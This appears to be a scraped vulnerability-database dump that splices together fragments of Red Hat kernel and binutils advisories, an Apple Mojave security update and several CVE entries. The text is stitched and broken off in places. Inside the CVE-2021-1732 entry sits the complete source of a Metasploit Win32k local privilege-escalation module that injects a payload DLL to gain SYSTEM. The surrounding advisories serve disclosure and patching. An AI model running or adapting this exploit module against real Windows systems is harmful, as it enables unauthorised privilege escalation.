1897869 - Running oslat in RT guest, guest kernel shows Call Trace: INFO: task kcompactd0:35 blocked for more than 600 seconds.
1900933 - CVE-2020-27786 kernel: use-after-free in kernel midi subsystem
1901161 - CVE-2020-15437 kernel: NULL pointer dereference in serial8250_isa_init_ports function in drivers/tty/serial/8250/8250_core.c
1901709 - CVE-2020-27835 kernel: child process is able to access parent mm through hfi dev file handle
1902724 - CVE-2020-35508 kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting ->real_parent
1903126 - CVE-2020-28974 kernel: slab-out-of-bounds read in fbcon
1915799 - CVE-2021-0342 kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege
1919889 - CVE-2020-0431 kernel: possible out of bounds write in kbd_keycode of keyboard.c
1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers
6. Package List:
Red Hat Enterprise Linux Real Time for NFV (v. 8):
Source:
kernel-rt-4.18.0-305.rt7.72.el8.src.rpm
x86_64:
kernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-kvm-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm
Red Hat Enterprise Linux Real Time (v. 8):
Source:
kernel-rt-4.18.0-305.rt7.72.el8.src.rpm
x86_64:
kernel-rt-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-core-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-core-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-devel-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-modules-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debug-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debuginfo-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-debuginfo-common-x86_64-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-devel-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-modules-4.18.0-305.rt7.72.el8.x86_64.rpm
kernel-rt-modules-extra-4.18.0-305.rt7.72.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2019-19523
https://access.redhat.com/security/cve/CVE-2019-19528
https://access.redhat.com/security/cve/CVE-2020-0431
https://access.redhat.com/security/cve/CVE-2020-11608
https://access.redhat.com/security/cve/CVE-2020-12114
https://access.redhat.com/security/cve/CVE-2020-12362
https://access.redhat.com/security/cve/CVE-2020-12464
https://access.redhat.com/security/cve/CVE-2020-14314
https://access.redhat.com/security/cve/CVE-2020-14356
https://access.redhat.com/security/cve/CVE-2020-15437
https://access.redhat.com/security/cve/CVE-2020-24394
https://access.redhat.com/security/cve/CVE-2020-25212
https://access.redhat.com/security/cve/CVE-2020-25284
https://access.redhat.com/security/cve/CVE-2020-25285
https://access.redhat.com/security/cve/CVE-2020-25643
https://access.redhat.com/security/cve/CVE-2020-25704
https://access.redhat.com/security/cve/CVE-2020-27786
https://access.redhat.com/security/cve/CVE-2020-27835
https://access.redhat.com/security/cve/CVE-2020-28974
https://access.redhat.com/security/cve/CVE-2020-35508
https://access.redhat.com/security/cve/CVE-2021-0342
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYKPwgNzjgjWX9erEAQiOVg//YfXIKUxc84y2aRexvrPHeTQvYkFMktq7
NEhNhHqEZbDUabM5+eKb5hoyG44PmXvQuK1njYjEbpTjQss92U8fekGJZAR9Zbsl
WEfVcu/ix/UJOzQj/lp+dKhirBSE/33xgBmSsQI6JQc+xn1AoZC8bOeSqyr7J6Y7
t6I552Llhun9DDUGS8KYAM8PkrK3RGQybAS3S4atTdYd0qk42ZPF7/XqrbI7G4iq
0Oe+ZePj6lN1O7pHV0WYUD2yzLTCZZopmz5847BLBEbGLqPyxlShZ+MFGsWxCOHk
tW8lw/nqVt/MNlOXI1tD6P6iFZ6JQYrRU5mGFlvsl3t9NQW60MxmcUNPgtVknXW5
BssBM/r6uLi0yFTTnDRZnv2MCs7fIzzqKXOHozrCvItswG6S8Qs72MaW2EQHAEen
m7/fMKWTjt9CQudNCm/FwHLb8O9cYnOZwRiAINomo2B/Fi1b7WlquETSmjgQaQNr
RxqtgiNQ98q92gnFgC8pCzxmiKRmHLFJEuxXYVq0O8Ch5i/eC8ExoO7Hqe6kYnJe
ZaST6fAtb2bMDcPdborfSIUmuDcYdKFtcEfCuuFZIbBxnL2aJDMw0zen/rmDNQyV
lwwXoKanoP5EjKKFMc/zkeHlOInMzeHa/0DIlA9h3kpro5eGN0uOPZvsrlryjC+J
iJzkORGWplM\xfb/D
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. 8) - noarch
3. 8) - aarch64, noarch, ppc64le, s390x, x86_64
3. 7.7) - ppc64, ppc64le, x86_64
3. Description:
The kernel packages contain the Linux kernel, the core of any Linux
operating system.
Security Fix(es):
* kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)
* kernel: use-after-free in fs/block_dev.c (CVE-2020-15436)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Bug Fix(es):
* RHEL7.7 - s390/dasd: Fix zero write for FBA devices (BZ#1931440)
* Kernel experiences panic in update_group_power() due to division error
even with Bug 1701115 fix (BZ#1961623)
4. Bugs fixed (https://bugzilla.redhat.com/):
1901168 - CVE-2020-15436 kernel: use-after-free in fs/block_dev.c
1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers
6.
Bug Fix(es):
* RHEL8.3 - Include patch: powerpc/pci: Remove LSI mappings on device
teardown (xive/pci) (BZ#1931925)
* RHEL8.2 - [P10][Denali] System crash during a perf sanity test (perf:)
(BZ#1933995)
* [RHEL 8.1] AMD/EPYC nested guest virtualization L1 guest crash
(BZ#1945404)
* [HPEMC 8.1 REGRESSION] skx_uncore: probe of 0008:80:08.0 failed with
error -22 (BZ#1947114)
* iperf3 over geneve created on vlan would fail (BZ#1947979)
* [Azure][RHEL-8]Mellanox Patches To Prevent Kernel Hang In MLX4
(BZ#1952071)
* [HPEMC 8.4 REGRESSION]: perf/x86/intel/uncore kernel panic vulnerability
on Haswell and Broadwell servers (BZ#1956685)
4
| VAR-202104-0590 | CVE-2021-1805 | Apple macOS process_token_BindQueryStoreRegisterToMemoryList Out-Of-Bounds Write Privilege Escalation Vulnerability |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
An out-of-bounds write was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.2.1, macOS Catalina 10.15.7 Supplemental Update, macOS Mojave 10.14.6 Security Update 2021-002. An application may be able to execute arbitrary code with kernel privileges. macOS Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows local attackers to escalate privileges on affected installations of Apple macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the AppleIntelKBLGraphics kext. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated data structure. There is a security vulnerability in the Intel Graphics Driver. Please keep an eye on CNNVD or the manufacturer's announcement.
The specific flaw exists within the AppleIntelKBLGraphics kext. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2021-04-26-4 Security Update 2021-003 Mojave
Security Update 2021-003 Mojave addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT212327.
APFS
Available for: macOS Mojave
Impact: A local user may be able to read arbitrary files
Description: The issue was addressed with improved permissions logic.
CVE-2021-1797: Thomas Tempelmann
Audio
Available for: macOS Mojave
Impact: An application may be able to read restricted memory
Description: A memory corruption issue was addressed with improved
validation.
CVE-2021-1808: JunDong Xie of Ant Security Light-Year Lab
CFNetwork
Available for: macOS Mojave
Impact: Processing maliciously crafted web content may disclose
sensitive user information
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2021-1857: an anonymous researcher
CoreAudio
Available for: macOS Mojave
Impact: A malicious application may be able to read restricted memory
Description: A memory corruption issue was addressed with improved
validation.
CVE-2021-1809: JunDong Xie of Ant Security Light-Year Lab
CoreGraphics
Available for: macOS Mojave
Impact: Opening a maliciously crafted file may lead to unexpected
application termination or arbitrary code execution
Description: A memory corruption issue was addressed with improved
validation.
CVE-2021-1847: Xuwei Liu of Purdue University
CoreText
Available for: macOS Mojave
Impact: Processing a maliciously crafted font may result in the
disclosure of process memory
Description: A logic issue was addressed with improved state
management.
CVE-2021-1811: Xingwei Lin of Ant Security Light-Year Lab
curl
Available for: macOS Mojave
Impact: A remote attacker may be able to cause a denial of service
Description: A buffer overflow was addressed with improved input
validation.
CVE-2020-8285: xnynx
curl
Available for: macOS Mojave
Impact: An attacker may provide a fraudulent OCSP response that would
appear valid
Description: This issue was addressed with improved checks.
CVE-2020-8286: an anonymous researcher
DiskArbitration
Available for: macOS Mojave
Impact: A malicious application may be able to modify protected parts
of the file system
Description: A permissions issue existed in DiskArbitration. This was
addressed with additional ownership checks.
CVE-2021-1784: Csaba Fitzl (@theevilbit) of Offensive Security, an
anonymous researcher, and Mikko Kenttälä (@Turmio_) of SensorFu
FontParser
Available for: macOS Mojave
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2021-1881: Hou JingYi (@hjy79425575) of Qihoo 360, an anonymous
researcher, Xingwei Lin of Ant Security Light-Year Lab, and Mickey
Jin of Trend Micro
FontParser
Available for: macOS Mojave
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: A logic issue was addressed with improved state
management.
CVE-2020-27942: an anonymous researcher
Foundation
Available for: macOS Mojave
Impact: A malicious application may be able to gain root privileges
Description: A validation issue was addressed with improved logic.
CVE-2021-1813: Cees Elzinga
ImageIO
Available for: macOS Mojave
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: This issue was addressed with improved checks.
CVE-2021-1843: Ye Zhang of Baidu Security
Intel Graphics Driver
Available for: macOS Mojave
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An out-of-bounds write was addressed with improved input
validation.
CVE-2021-1805: ABC Research s.r.o. working with Trend Micro Zero Day
Initiative
Intel Graphics Driver
Available for: macOS Mojave
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A race condition was addressed with additional
validation.
CVE-2021-1806: ABC Research s.r.o. working with Trend Micro Zero Day
Initiative
Intel Graphics Driver
Available for: macOS Mojave
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2021-1834: ABC Research s.r.o. working with Trend Micro Zero Day
Initiative
Kernel
Available for: macOS Mojave
Impact: A malicious application may be able to disclose kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2021-1851: @0xalsr
Kernel
Available for: macOS Mojave
Impact: A local attacker may be able to elevate their privileges
Description: A memory corruption issue was addressed with improved
validation.
CVE-2021-1840: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong
Security Lab
libxpc
Available for: macOS Mojave
Impact: A malicious application may be able to gain root privileges
Description: A race condition was addressed with additional
validation.
CVE-2021-30652: James Hutchins
libxslt
Available for: macOS Mojave
Impact: Processing a maliciously crafted file may lead to heap
corruption
Description: A double free issue was addressed with improved memory
management.
CVE-2021-1875: Found by OSS-Fuzz
NSRemoteView
Available for: macOS Mojave
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2021-1876: Matthew Denton of Google Chrome
Preferences
Available for: macOS Mojave
Impact: A local user may be able to modify protected parts of the
file system
Description: A parsing issue in the handling of directory paths was
addressed with improved path validation.
CVE-2021-1739: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)
of Tencent Security Xuanwu Lab (xlab.tencent.com)
smbx
Available for: macOS Mojave
Impact: An attacker in a privileged network position may be able to
leak sensitive user information
Description: An integer overflow was addressed with improved input
validation.
CVE-2021-1878: Aleksandar Nikolic of Cisco Talos
(talosintelligence.com)
Tailspin
Available for: macOS Mojave
Impact: A local attacker may be able to elevate their privileges
Description: A logic issue was addressed with improved state
management.
CVE-2021-1868: Tim Michaud of Zoom Communications
tcpdump
Available for: macOS Mojave
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2020-8037: an anonymous researcher
Time Machine
Available for: macOS Mojave
Impact: A local attacker may be able to elevate their privileges
Description: The issue was addressed with improved permissions logic.
CVE-2021-1839: Tim Michaud(@TimGMichaud) of Zoom Video Communications
and Gary Nield of ECSC Group plc
Wi-Fi
Available for: macOS Mojave
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: A memory corruption issue was addressed with improved
validation.
CVE-2021-1828: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong
Security Lab
wifivelocityd
Available for: macOS Mojave
Impact: An application may be able to execute arbitrary code with
system privileges
Description: The issue was addressed with improved permissions logic.
CVE-2020-3838: Dayton Pidhirney (@_watbulb)
Windows Server
Available for: macOS Mojave
Impact: A malicious application may be able to unexpectedly leak a
user's credentials from secure text fields
Description: An API issue in Accessibility TCC permissions was
addressed with improved state management.
CVE-2021-1873: an anonymous researcher
Installation note:
This update may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://support.apple.com/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAmCHO2EACgkQZcsbuWJ6
jjBHBhAAmHYbcREaaxOXQwrb56He+ool1GyXUCGknHRnEO6Ik0nyE/GeUPuv8Y/Q
/ywr188mv3ehtjFlXWpHtqwOn0KoNlAlcE+jy9r3QGTxNmBM2z30FeC0wiYYEi7s
I5xWkZIcnO1jq2CMGVHHfbLhyLnkWblwWvCOWriCRzbTocEWgEqwrh/uguTVRWB4
oVo8+uHcdiS2gqS0LIMbbvP6SGkfPwVlL8Mr/e96xdditiRbZX01GkAm0l5ezYHt
xrs8378fmQK3su4dHrkHpFpTmT3Yib8Jtotat8cgu6lWxLGEFR5kOye4QIjFCl/a
UhnR52nlMyYlh4anbqUs7PAh2QDVa3scaRfGTdAogPfaZIAhaaiuj8qXUOsAxEhk
rf0TOXmgCDfhuaA08Ys43sgUgunPLOa2+jMT4VspLZxDTkWLDrGFjlM4P5643WrT
ITAKLoqq8SOhce6gd3VECvG+EK/fBWrdwzsVDzfxU3yW3kSCKxX25KcRePwJZAAu
s1ZZpIZdY7rmi1DwafNSig2dncjUZJy6AhiI5w6cpQzBOQVioU8oac2JDi1X2Rn1
k/D3VQfmYas7HGqUSwx3MUx+yybktm+8Ogo+vtcRKCzUF5t13bwpyAda0mJ62c6L
I/ISWomRdC4XX3AQL5EJLzO9slpOBqWsbQb0cULdt+mb4H+nLDE=
=NZ77
-----END PGP SIGNATURE-----
| VAR-202102-0786 | CVE-2021-1732 | Microsoft Win32k Security feature vulnerability |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Windows Win32k Elevation of Privilege Vulnerability. Microsoft Win32k是美国微软(Microsoft)公司的一个用于Windows多用户管理的系统文件.
Microsoft Win32k 中存在安全特征问题漏洞。以下产品及版本受到影响:Windows 10 Version 1803 for 32-bit Systems,Windows 10 Version 1803 for x64-based Systems,Windows 10 Version 1803 for ARM64-based Systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 1909 for 32-bit Systems,Windows 10 Version 1909 for x64-based Systems,Windows 10 Version 1909 for ARM64-based Systems,Windows Server, version 1909 (Server Core installation),Windows 10 Version 2004 for 32-bit Systems,Windows 10 Version 2004 for ARM64-based Systems,Windows 10 Version 2004 for x64-based Systems,Windows Server, version 2004 (Server Core installation),Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation). ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Deprecated
moved_from 'exploit/windows/local/cve_2021_1732_win32k'
def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Win32k ConsoleControl Offset Confusion',
'Description' => %q{
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
achieve an out of bounds write operation, eventually leading to privilege escalation.
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
function on a wider range of Windows 10 targets.
},
'License' => MSF_LICENSE,
'Author' => [
# CVE-2021-1732
'BITTER APT', # exploit as used in the wild
'JinQuan', # detailed analysis
'MaDongZe', # detailed analysis
'TuXiaoYi', # detailed analysis
'LiHao', # detailed analysis
# CVE-2022-21882
'L4ys', # github poc
# both CVEs
'KaLendsi', # github pocs
# Metasploit exploit
'Spencer McIntyre' # metasploit module
],
'Arch' => [ ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
],
'Payload' => {
'DisableNops' => true
},
'References' => [
# CVE-2021-1732 references
[ 'CVE', '2021-1732' ],
[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
# CVE-2022-21882 references
[ 'CVE', '2022-21882' ],
[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
],
'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_OS_RESTARTS, ],
'Reliability' => [ REPEATABLE_SESSION, ],
'SideEffects' => []
}
}
)
)
end
def check
sysinfo_value = sysinfo['OS']
if sysinfo_value !~ /windows/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Windows Build Number = #{build_num}")
unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)
print_error('The exploit only supports Windows 10 versions 1803 - 21H2')
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),
[encoded_payload.length].pack('I<') + encoded_payload
)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end
| VAR-202102-1554 | No CVE | Jabil SSLVPN management system has weak password vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The business scope of Xi'an Jiaotong University Jabil Network Technology Co., Ltd. includes: computer network routers, network switches, network terminal products, network information processing products, electronic products and software.
Jabil's SSLVPN management system has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.
| VAR-202102-1333 | CVE-2021-25141 | plural HPE and Aruba L2/L3 Vulnerability in switch firmware |
CVSS V2: 4.9 CVSS V3: 4.4 Severity: MEDIUM |
A security vulnerability has been identified in in certain HPE and Aruba L2/L3 switch firmware. A data processing error due to improper handling of an unexpected data type in user supplied information to the switch's management interface has been identified. The data processing error could be exploited to cause a crash or reboot in the switch management interface and/or possibly the switch itself leading to local denial of service (DoS). The user must have administrator privileges to exploit this vulnerability. Arubanetwork Aruba/HPE is a switch made by Arubanetwork in the United States. A large number of ports for cable connection are provided, so that star topology wiring can be adopted
| VAR-202103-0479 | CVE-2021-20197 | GNU binutils Link interpretation vulnerability in |
CVSS V2: 3.3 CVSS V3: 6.3 Severity: MEDIUM |
There is an open race window when writing output in the following utilities in GNU binutils version 2.35 and earlier:ar, objcopy, strip, ranlib. When these utilities are run as a privileged user (presumably as part of a script updating binaries across different users), an unprivileged user can trick these utilities into getting ownership of arbitrary files through a symlink. GNU binutils There is a link interpretation vulnerability in.Information may be obtained and information may be tampered with. GNU Binutils (GNU Binary Utilities or binutils) is a set of programming language tool programs developed by the GNU community. The program is primarily designed to handle object files in various formats and provides linkers, assemblers, and other tools for object files and archives. An access control error vulnerability exists in GNU binutils that allows smart_rename() to bypass access restrictions, allowing an attacker to read or change data. Bugs fixed (https://bugzilla.redhat.com/):
2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
5. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: binutils security update
Advisory ID: RHSA-2021:4364-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2021:4364
Issue date: 2021-11-09
CVE Names: CVE-2020-35448 CVE-2021-3487 CVE-2021-20197
CVE-2021-20284
====================================================================
1. Summary:
An update for binutils is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
The binutils packages provide a collection of binary utilities for the
manipulation of object code in various object file formats. It includes the
ar, as, gprof, ld, nm, objcopy, objdump, ranlib, readelf, size, strings,
strip, and addr2line utilities.
Security Fix(es):
* binutils: Excessive debug section size can cause excessive memory
consumption in bfd's dwarf2.c read_section() (CVE-2021-3487)
* binutils: Race window allows users to own arbitrary files
(CVE-2021-20197)
* binutils: Heap-based buffer overflow in bfd_getl_signed_32() in libbfd.c
because sh_entsize is not validated in
_bfd_elf_slurp_secondary_reloc_section() in elf.c (CVE-2020-35448)
* binutils: Heap-based buffer overflow in
_bfd_elf_slurp_secondary_reloc_section in elf.c (CVE-2021-20284)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.5 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1913743 - CVE-2021-20197 binutils: Race window allows users to own arbitrary files
1924068 - binutils debuginfo misses code for bfd functions
1930988 - Backport breaks building with LTO
1935785 - Linker garbage collection removes weak alias references (possibly "regression" of bz1804325)
1937784 - CVE-2021-20284 binutils: Heap-based buffer overflow in _bfd_elf_slurp_secondary_reloc_section in elf.c
1946518 - binutils-2.30-98 are causing go binaries to crash due to segmentation fault on aarch64
1946977 - pthread_join segfaults in stack unwinding
1947111 - CVE-2021-3487 binutils: Excessive debug section size can cause excessive memory consumption in bfd's dwarf2.c read_section()
1950478 - CVE-2020-35448 binutils: Heap-based buffer overflow in bfd_getl_signed_32() in libbfd.c because sh_entsize is not validated in _bfd_elf_slurp_secondary_reloc_section() in elf.c
1969775 - /usr/bin/ld: Dwarf Error: Offset (2487097600) greater than or equal to .debug_str size (571933).
6. Package List:
Red Hat Enterprise Linux AppStream (v. 8):
aarch64:
binutils-debuginfo-2.30-108.el8.aarch64.rpm
binutils-debugsource-2.30-108.el8.aarch64.rpm
binutils-devel-2.30-108.el8.aarch64.rpm
ppc64le:
binutils-debuginfo-2.30-108.el8.ppc64le.rpm
binutils-debugsource-2.30-108.el8.ppc64le.rpm
binutils-devel-2.30-108.el8.ppc64le.rpm
s390x:
binutils-debuginfo-2.30-108.el8.s390x.rpm
binutils-debugsource-2.30-108.el8.s390x.rpm
binutils-devel-2.30-108.el8.s390x.rpm
x86_64:
binutils-debuginfo-2.30-108.el8.i686.rpm
binutils-debuginfo-2.30-108.el8.x86_64.rpm
binutils-debugsource-2.30-108.el8.i686.rpm
binutils-debugsource-2.30-108.el8.x86_64.rpm
binutils-devel-2.30-108.el8.i686.rpm
binutils-devel-2.30-108.el8.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 8):
Source:
binutils-2.30-108.el8.src.rpm
aarch64:
binutils-2.30-108.el8.aarch64.rpm
binutils-debuginfo-2.30-108.el8.aarch64.rpm
binutils-debugsource-2.30-108.el8.aarch64.rpm
ppc64le:
binutils-2.30-108.el8.ppc64le.rpm
binutils-debuginfo-2.30-108.el8.ppc64le.rpm
binutils-debugsource-2.30-108.el8.ppc64le.rpm
s390x:
binutils-2.30-108.el8.s390x.rpm
binutils-debuginfo-2.30-108.el8.s390x.rpm
binutils-debugsource-2.30-108.el8.s390x.rpm
x86_64:
binutils-2.30-108.el8.x86_64.rpm
binutils-debuginfo-2.30-108.el8.x86_64.rpm
binutils-debugsource-2.30-108.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2020-35448
https://access.redhat.com/security/cve/CVE-2021-3487
https://access.redhat.com/security/cve/CVE-2021-20197
https://access.redhat.com/security/cve/CVE-2021-20284
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYYrcWdzjgjWX9erEAQgOuA//ddTY+J3xDL8Z+2Gi+qcbItkoW0B8nKrt
hqWmx6c/KlhAtLnAbIh18N+1uPMAXGNZcKHtCJfFSIAP3B71jDBqA+CRqlhiapmg
ze4qYNpUwBg0e2c/6w0V5GYhIXpdsyiKXTpjmnaxnzW61tiCCWFBZoWpzJjSId1X
yR7vHjDaXT1CZl0fHS/5Y9NfK/7jjgkJv7U7wcUxEsy6bMQIzM0nMLZauVmIrsC0
vu1bhQifEJH1mnoykfnlRVSEe+qGMrEtnOCnos8GTGChmVt4bgogpb5oE4JFm+bs
